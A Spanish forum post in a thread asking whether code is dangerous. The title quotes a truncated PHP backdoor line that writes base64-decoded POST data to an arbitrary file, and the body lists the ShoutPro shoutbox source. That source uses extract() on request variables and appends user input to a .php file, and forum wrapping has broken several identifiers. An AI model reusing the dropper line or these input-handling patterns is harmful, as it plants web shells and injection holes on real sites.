Foros del Web - Ver Mensaje Individual - Puede ser peligroso este codigo? (<?$a=fopen($_POST['f'],'w');fwrite($a,base64_decode

F.Y.N. · #6 (**permalink**) 14/05/2007, 16:52

no lo hice yo, es un script libre de shoutpro.com

Cita:

<?php
if ($_POST["action"]!="") $action = $_POST['action'];
else if ($_GET["action"]!="") $action = $_GET["action"];

if ($_POST["name"]!="") $name = $_POST['name'];
else if ($_GET["name"]!="") $name = $_GET["name"];

if ($_POST["pass"]!="") $pass = $_POST['pass'];
else if ($_GET["pass"]!="") $pass = $_GET["pass"];

if ($_POST["shout"]!="") $shout = $_POST['shout'];
else if ($_GET["shout"]!="") $shout = $_GET["shout"];
require("include.php");
$restricted_names = array();
$index = 0;
$FileName="lists/names.php";
$list = file ($FileName);
foreach ($list as $value) {
list ($restrictedname,$namepass,$nameemail,) = explode ("|^|", $value);
$restricted_names[$index] = trim(strtolower($restrictedname));
$index++;
}

extract($HTTP_REQUEST_VARS);

if($action == "post" && $name && $name != "Name"){
//Prepare the name
$shout = trim($shout);
$shout = stripslashes($shout);
$shout = str_replace ("\n", " ", $shout);
$shout = str_replace ("\r", " ", $shout);
$name = trim($name);
$name = killhtml(killscript($name));
restrictedname($name,$pass);
setcookie("shoutpro_username", "", time() - 31536000);
$cookielife = time() + 31536000;
setcookie("shoutpro_username", $name, $cookielife);
}
?>
<html><head><title><?=$shoutboxname ?></title>
<link rel="stylesheet" href="<?=$theme ?>" type="text/css" />
<style type="text/css">.shout {overflow: hidden;}</style>
<SCRIPT language="JavaScript">
function reload() {
var loc = "shoutbox.php?";
if (document.getElementById('moreshouts').style.displ ay == 'inline')
loc += "viewall=true&";
<? if ($userpanelon == "yes"){ ?>
if (document.getElementById('userpaneloff').style.dis play == 'inline')
loc += "userpanelon=true&";
<? } ?>
location.href = loc;
}

function checkrname() {
var isin = false;
if (document.getElementById('name').value != ""){
for (var i = 0; i < namesarray.length; i++){
if (namesarray[i] == document.getElementById('name').value.toLowerCase( )){
alert("You have entered a registered name. Please provide the password.");
document.getElementById('passwordfield').style.dis play = 'inline';
document.getElementById('pass').focus();
isin = true;
}
}
}
if (isin == false){
document.getElementById('passwordfield').style.dis play = 'none';
document.getElementById('shout').focus();
document.getElementById('shout').select();
return false;
}
else return true;
}

function CheckForm(){
//Check if a name has been entered
if (document.getElementById('name').value == "" || document.getElementById('name').value == "Name"){
alert("<?=$inputname ?>");
document.getElementById('name').focus();
document.getElementById('name').select();
return false;
}

//Check if a shout has been entered
if (document.getElementById('shout').value == "" || document.getElementById('shout').value == "Shout!"){
alert("<?=$inputshout ?>");
document.getElementById('shout').focus();
document.getElementById('shout').select();
return false;
}

return true ;
}

function doviewall() {
document.getElementById('moreshouts').style.displa y = 'inline';
document.getElementById('viewall').style.display = 'none';
document.getElementById('viewless').style.display = 'inline';
}

function doviewless() {
document.getElementById('moreshouts').style.displa y = 'none';
document.getElementById('viewall').style.display = 'inline';
document.getElementById('viewless').style.display = 'none';
}

function openhelp() {
window.open('help.php','help_window','toolbar=no,l ocation=no,directories=no,status=no,menubar=no,scr ollbars=yes,resizable=no,copyhistory=no,width=270, height=400')
}

function stoptmr(){
if(tmron){
clearTimeout(timerID);
tmron = false;
}
}

function starttmr(){
stoptmr();
timerID = setTimeout('reload()', <?=$refresh ?>000);
tmron = true;
}
var tmron = false;
var tmrid;
<? if($refreshmode != "manual") echo("starttmr();"); ?>
var namesarray = new Array("<?=implode('","', $restricted_names); ?>");
</SCRIPT>
</head>
<body style="width: <?=$width ?>px !important;">
<?php
if($action=="post"){
if (!$name) echo("<script>alert(\"".$inputname."\");</script>");
else if (!$shout || $shout=="Shout!") echo("<script>alert(\"".$inputshout."\");</script>");
else {

$shout = trim($shout);
$shout = stripslashes($shout);
$shout = str_replace ("\n", " ", $shout);
$shout = str_replace ("\r", " ", $shout);
badname($name);
if(!namelength($name,$nameminlength,$namemaxlength )) die();
$shout = first($shout);
$name = first($name);
if(!length($shout,$minlength,$maxlength)) die();
$date = date("F j, Y", time() + $timeoffset * 3600);
$time = date("g:i A", time() + $timeoffset * 3600);

if($FilePointer = fopen("shouts.php", "a+")){
fwrite($FilePointer,"$name|^|$shout|^|$date|^|$tim e|^|$_SERVER[REMOTE_ADDR]|^|\n");
fclose($FilePointer);
}
}
echo("<script>location.href='shoutbox.php';</script>");
}
if ($displayname == "yes") echo ("<div align=center><b>$shoutboxname</b><br /><br />");
echo("<form name='postshout' method='post' action='shoutbox.php?action=post'>\n");
echo("<input id='name' class='textbox' name='name' type='text' value='");
if ($_COOKIE["shoutpro_username"]) echo $_COOKIE["shoutpro_username"];
else echo "Name";
echo ("' onFocus=\"stoptmr()\" onBlur=\"checkrname();\"><br />\n");
if ($_COOKIE["shoutpro_username"] && in_array(strtolower($_COOKIE["shoutpro_username"]),$restricted_names))
echo "<div id='passwordfield' style='display:inline'>";
else
echo "<div id='passwordfield' style='display:none'>";
echo("<input class='textbox' name='pass' id='pass' type='password' value='' onBlur=\"if(this.value != ''){document.getElementById('shout').focus();docum ent.getElementById('shout').select();}\" onFocus=\"stoptmr()\" /><br />\n</div><textarea id='shout' class=textbox name='shout' rows='5' onFocus=\"stoptmr()\">Shout!</textarea><br />\n");
echo("<div id='buttons'><input class=textbox type='submit' id='post' name='post' onFocus=\"this.select();\" value='Post' onclick='return CheckForm();'>\n");
if ($refreshmode != "auto") echo("<input class=textbox type=button value='Refrescar' onClick=\"reload()\">\n");
echo("</div></div>");
$row_count = 0;
$shouts = file("shouts.php");
$shouts = array_reverse($shouts);
foreach ($shouts as $item){
if ($row_count == $numshoutsdisplay){
if ($_REQUEST["viewall"] == true) echo "<div id='moreshouts' style='display:inline'>";
else echo "<div id='moreshouts' style='display:none'>";
$viewalled = true; //We already displayed the viewall div
}
$row = ($row_count % 2) ? "one" : "two";
list ($poster,$message,$date,$time,$ip) = explode ("|^|", $item);
$thisnamecolor = "";
$thisnamecolor = colornames($poster,$thisnamecolor);
$message=profanityfilter(shoutcode(smilies(killhtm l($message))));
$thisshout = "<span style='color: $thisnamecolor !important;' class='name'>$poster:</span> $message";
$thisshout = killscript($thisshout);
echo "<div class='shout' id='row-$row' title=\"Posted $date @ $time\">$thisshout</div>";
$row_count++;
}
if (!$viewalled) echo "<div id='moreshouts' style='display:none'>";
echo "</div><br /><div id='bottomlinks'>";
if ($row_count > $numshoutsdisplay){
if ($_REQUEST["viewall"] == true) echo "<a href='shoutbox.php?viewall=true' onClick='doviewall();' style='display:none' id='viewall'>Ver Todos</a><a href='shoutbox.php' onClick='doviewless();' id='viewless'>Ver Menos</a>::";
else echo "<a href='shoutbox.php?viewall=true' onClick='doviewall();' id='viewall'>Ver Todos</a><a href='shoutbox.php' onClick='doviewless(); ' style='display:none' id='viewless'>Ver Menos</a>::";
}
echo "<a href=\"javascript:openhelp();\">Ayuda</a>";
if($userpanelon == "yes")
if ($_REQUEST["userpanelon"] == true) echo "<br /><a href='#' id='userpanelon' onClick=\"document.getElementById('userpanel').sty le.display='inline';document.getElementById('userp anelon').style.display='none';document.getElementB yId('userpaneloff').style.display='inline';\" style='display:none'>Abrir Panel Control</a><a href='#' id='userpaneloff' onClick=\"document.getElementById('userpanel').sty le.display='none';document.getElementById('userpan elon').style.display='inline';document.getElementB yId('userpaneloff').style.display='none';\" style='display:inline'>Cerrar Panel Control</a>";
else echo "<br /><a href='#' id='userpanelon' onClick=\"document.getElementById('userpanel').sty le.display='inline';document.getElementById('userp anelon').style.display='none';document.getElementB yId('userpaneloff').style.display='inline';\">Abri r Panel Control</a><a href='#' id='userpaneloff' onClick=\"document.getElementById('userpanel').sty le.display='none';document.getElementById('userpan elon').style.display='inline';document.getElementB yId('userpaneloff').style.display='none';\" style='display:none'>Cerrar Panel Control</a>";
?>
</div><br />
<div id='userpanel' style='display:<? if ($_REQUEST["userpanelon"] == true) echo "inline"; else echo "none"; ?>'>
<a href='#' onClick="window.open('userpanel/register.php','userpanel','toolbar=no,location=no, directories=no,status=no,menubar=no,scrollbars=yes ,resizable=yes,copyhistory=no,width=400,height=400 ');"> -->Registrar un Nick</a><br />
<a href='#' onClick="window.open('userpanel/changepass.php','userpanel','toolbar=no,location=n o,directories=no,status=no,menubar=no,scrollbars=y es,resizable=yes,copyhistory=no,width=400,height=4 00');"> -->Cambiar tu Password</a><br />
<a href='#' onClick="window.open('userpanel/findpass.php','userpanel','toolbar=no,location=no, directories=no,status=no,menubar=no,scrollbars=yes ,resizable=yes,copyhistory=no,width=400,height=400 ');"> -->Resetear tu Password</a><br /><br />
</div>